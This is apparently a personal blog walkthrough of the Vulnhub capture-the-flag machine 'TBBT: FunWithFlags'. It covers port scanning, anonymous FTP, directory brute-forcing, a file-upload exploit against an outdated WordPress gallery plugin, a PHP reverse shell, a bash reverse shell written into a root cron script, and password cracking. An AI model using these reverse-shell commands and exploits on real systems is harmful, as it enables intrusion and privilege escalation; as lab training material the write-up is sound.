m8r0wn
Blog  |  Walkthroughs  |  Talks  |  About
menu

TBBT: FunWithFlags Walkthrough (Vulnhub)

March 18, 2020
As a fan of The Big Bang Theory, and while practicing "social distance" due to COVID-19, I decided to try a writeup for emaragko's TBBT: FunWithFlags machine on vulnhub.com. My goal was to gain root privileges on the box and identify all 7 flags using only open source tools, without the use of Metasploit.

Port Scanning

When first launching the virtual machine (VM) with VirtualBox, the DHCP address was provided on screen prior to login. Anyone who has used vulnhub before knows, this is super helpful as the first step is always finding where the system landed on the network. Using the remote address, I started on my Kali machine and launched an Nmap scan, with the service detection argument, to see what services were available for further investigation.
nmap -Pn -sV 192.168.1.105 -p 0-65535 -v

Nmap scan report for 192.168.1.105
Host is up (0.010s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
1337/tcp open  waste?

Anonymous FTP

Reviewing the port scan results, I checked the FTP server on port 21 for anonymous access using the username "anonymous" and was not prompted for a password. This allowed me to search the directories of each user and download files for review:
ftp 192.168.1.105
Connected to 192.168.1.105.
220 (vsFTPd 3.0.3)
Name (192.168.1.105:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls pub
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Mar 03 23:57 amy
drwxr-xr-x    2 ftp      ftp          4096 Mar 04 00:40 bernadette
drwxr-xr-x    2 ftp      ftp          4096 Mar 17 19:38 howard
drwxr-xr-x    2 ftp      ftp          4096 Mar 03 23:57 leonard
drwxr-xr-x    2 ftp      ftp          4096 Mar 05 00:25 penny
drwxr-xr-x    2 ftp      ftp          4096 Mar 03 23:57 raj
-rw-r--r--    1 ftp      ftp        297410 Mar 04 00:09 roomate_agreement.jpg
-rw-r--r--    1 ftp      ftp          3348 Mar 04 00:08 roomate_agreement.txt
drwxr-xr-x    2 ftp      ftp          4096 Mar 04 19:38 sheldon
226 Directory send OK.
ftp>
While digging through each named directory, I found the file "/pub/bernadette/PENNY_README_ASAP.txt". This provided Penny's username and indicate credential reuse on the account. Therefore, I went to the "/pub/penny/" directory, where I found another file called "wifi_password.txt". I had a good laugh reviewing some of the other content on the server but, with a potential set of credentials, it was time to check out the web application hosted on port 80.
root@T460: cat PENNY_README_ASAP.txt
Penny the IT department from my Pharmaceutical company opened you an account in the B2B website.
You need to go there ASAP and learn our drugs for your interview tomorrow.
I dont remember the link, but it is easy you will find it!
Username: penny69
Password: cant post it here as sheldon said. you know the password. you use it everywhere.

Directory Brute Force

The web server's root page provided little information and contained no links for further browsing, although the robots.txt file contained some interesting invalid entries. To help identify a potential attack surface, I performed directory brute-forcing with dirb using the default wordlist (/usr/share/dirb/wordlists/common.txt). This revealed a phpmyadmin portal, a private "Prescription Drug B2B" page where I was able to leverage the previously collected "penny69" credentials, and a WordPress site hosted at "/music/wordpress".
root@T460: dirb http://192.168.1.105
...
---- Scanning URL: http://192.168.1.105/ ----
+ http://192.168.1.105/index.html (CODE:200|SIZE:239)
==> DIRECTORY: http://192.168.1.105/javascript/
==> DIRECTORY: http://192.168.1.105/music/
==> DIRECTORY: http://192.168.1.105/phpmyadmin/
==> DIRECTORY: http://192.168.1.105/private/
+ http://192.168.1.105/robots.txt (CODE:200|SIZE:112)
+ http://192.168.1.105/server-status (CODE:403|SIZE:301)
...

WordPress Scanning

After attempting default credentials on the server's login pages without success, I used WPScan to assess the WordPress site. This revealed an out-of-date plugin, reflex-gallery, using an insecure version 3.1.3:
root@T460: wpscan --url http://192.168.1.105/music/wordpress -e ap
...
[+] reflex-gallery
 | Location: http://192.168.1.105/music/wordpress/wp-content/plugins/reflex-gallery/
 | Last Updated: 2019-05-10T16:05:00.000Z
 | [!] The version is out of date, the latest version is 3.1.7
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 3.1.3 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.1.105/music/wordpress/wp-content/plugins/reflex-gallery/readme.txt
...

PHP Shell

The reflex-gallery plugin version 3.1.3 has a publicly available exploit that allowed for arbitrary file upload on the server. This exploit code is freely available on exploit-db (36374), yet required some minor modifications to fit our situation. While reading through the code, I manually investigated each URL referenced and found the first flag at: http://192.168.1.105:1337/wordpress/wp-content/uploads/2015/03/.
FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}
<form method="POST" action="http://192.168.1.105/music/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2020&Month=03" enctype="multipart/form-data">
<input type="file" name="qqfile"><br>
<input type="submit" name="Submit" value="Pwn!">
</form>
The exploit code created a stand alone HTML form that sent a POST request to the vulnerable server, ultimately uploading our payload file. This occurred because the application failed to properly sanitize the user supplied input. As a result, I was able to upload a PHP reverse shell and forced server execution by browsing to http://192.168.1.105/music/wordpress/wp-content/uploads/2020/03/php-reverse-shell.php. The reverse shell was used to gain an initial foothold on the system as the "www-data" user.

Privilege Escalation

Once on the system, I used the following command to elevate the limited shell to "/bin/bash" and continued searching the file system:
python3 -c 'import pty;pty.spawn("/bin/bash")'
The home directory look very similar to the FTP server, with a user folder configured for each person on the show. After further investigation, the "/home/leonard" directory contained a file called "thermostat_set_temp.sh" with read-write-execute permissions by any user on the system. Furthermore, this file was executed by the root user every minute through an automated cron job. To exploit this configuration, a bash reverse shell was echo'ed into the file and a new listener was setup on my Kali system to capture the incoming shell.
www-data@tbbt:/home$ ls
amy  bernadette  funwithflags  howard  leonard	penny  raj  sheldon

www-data@tbbt:/home$ ls leonard -al
total 24
drwxr-xr-x  2 leonard leonard 4096 Mar  6 00:47 .
drwxr-xr-x 10 root    root    4096 Mar  4 02:33 ..
-rw-------  1 leonard leonard    0 Mar  6 00:47 .bash_history
-rw-r--r--  1 leonard leonard  220 Sep  1  2015 .bash_logout
-rw-r--r--  1 leonard leonard 3771 Sep  1  2015 .bashrc
-rw-r--r--  1 leonard leonard  655 May 16  2017 .profile
-rwxrwxrwx  1 root    root      43 Mar 17 17:58 thermostat_set_temp.sh

www-data@tbbt:/home$ cat /etc/crontab
...
# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/1 *	* * *	root	/home/leonard/thermostat_set_temp.py
...

www-data@tbbt:/home$ echo "bash -i >& /dev/tcp/192.168.1.19/8081 0>&1" > /home/leonard/thermostat_set_temp.sh
Once the cron job was triggered and root shell initiated, I was able to read the following flag at "/root/FLAG-leonard.txt":
root@tbbt: cat /root/FLAG-leonard.txt
                         ____
                        /    \
                       /______\
                          ||
           /~~~~~~~~\     ||    /~~~~~~~~~~~~~~~~\
          /~ () ()  ~\    ||   /~ ()  ()  () ()  ~\
         (_)========(_)   ||  (_)==== ===========(_)
          I|_________|I  _||_  |___________________|
.////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

Gongrats!
You have rooted the box! Now you can sit on Sheldons spot!
FLAG-leonard{17fc95224b65286941c54747704acd3e}

I hope you liked it!

Amy Flag

Inside the "/home/amy" directory, a Linux binary called "secretdiary" was found. After performing the strings command on the file, the password and flag values were revealed. I went back and execute the file, inputting the proper information, for additional verification:
www-data@tbbt:/home/amy$ ./secretdiary
Enter your username:
amy
Enter your password:
-------

Login Success!

Soon I will be adding my secrets here..
FLAG-amy{60263777358690b90e8dbe8fea6943c9}

Penny Flag

A hidden file was discovered at "/home/penny/.FLAG.penny.txt" that exposed a base64 encoded string. The following command was used to decode the string and recover the flag:
www-data@tbbt:/home/penny$ cat .FLAG.penny.txt|base64 -d && echo -e "\n"
cat .FLAG.penny.txt|base64 -d && echo -e "\n"
FLAG-penny{dace52bdb2a0b3f899dfb3423a992b25}

Bernadette Flag

While executing commands as the "www-data" user, looking for privilege escalation opportunities, I dug through the web application configuration files. This revealed database credentials to the "bigpharamcorp" user in "/var/www/html/private/db_config.php":
www-data@tbbt:/var/www/html/private$ cat db_config.php
<?php
// Create connection
$DBUSER = 'bigpharmacorp';
$DBPASS = '-------';

$con=mysqli_connect("127.0.0.1",$DBUSER,$DBPASS,"bigpharmacorp");
...
This was used to access "http://192.168.1.105/phpmyadmin/" and search the bigpharmacorp > users table. The Bernadette flag was found in the "bernadette" user's description field, as shown below. I used Hashcat to recover additional user accounts on this site. However, no additional flags were found or access provided.

Raj Flag

Following the same path used to identify the Bernadette flag, I enumerated the WordPress configuration file at "/var/www/html/music/wordpress/" to reveal another set of database credentials:
www-data@tbbt:/var/www/html/music/wordpress$ cat wp-config.php
...
/** The name of the database for WordPress */
define( 'DB_NAME', 'footprintsonthemoon' );

/** MySQL database username */
define( 'DB_USER', 'footprintsonthemoon' );

/** MySQL database password */
define( 'DB_PASSWORD', '---------' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
...
Logging into the phpmyadmin site, these credentials provided access to the footprintsonthemoon database where a private WordPress post was found with the Raj flag. Note, I am assuming the name listed on the flag is a typo.

Howard Flag

This was the hardest of the 7 flags to find and definitely required some persistence! During my initial look at the anonymous FTP server, a password-protected zip file was found at "/pub/howard/super_secret_nasa_stuff_here.zip". Unable to guess the password, I set it aside hoping to find the password elsewhere on the system.
I root'ed the box and found the other 6 flags, but was out of luck on this one. I turned to fcrackzip to try and brute-force the password, using the rockyou.txt password list, and was able to successfully recover the "marsroversketch.jpg" file after only a few minutes.
root@T460: fcrackzip -u -D -p rockyou.txt super_secret_nasa_stuff_here.zip
PASSWORD FOUND!!!!: pw == ------  
To my surprise, the picture provided no indication of a flag. However, it felt like there was still more to find. I spent some time researching steganography and came across the tool stegcracker, which is a Python based utility that can brute-force a picture file to uncover hidden data. I tried this against the unzipped image, again using the rockyou.txt list, to recover the last and final flag!
root@T460: stegcracker marsroversketch.jpg rockyou.txt
StegCracker 2.0.7 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2020 - Luke Paris (Paradoxis)

Counting lines in wordlist..
Attacking file 'marsroversketch.jpg' with wordlist 'rockyou.txt'..
Successfully cracked file with password: --------
Tried 51285 passwords
Your file has been written to: marsroversketch.jpg.out

root@T460: cat marsroversketch.jpg.out
FLAG-howard{b3d1baf22e07874bf744ad7947519bf4}


References and Additional Resources:

https://www.vulnhub.com/entry/tbbt-funwithflags,437/
https://www.exploit-db.com/exploits/36374
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://github.com/Paradoxis/StegCracker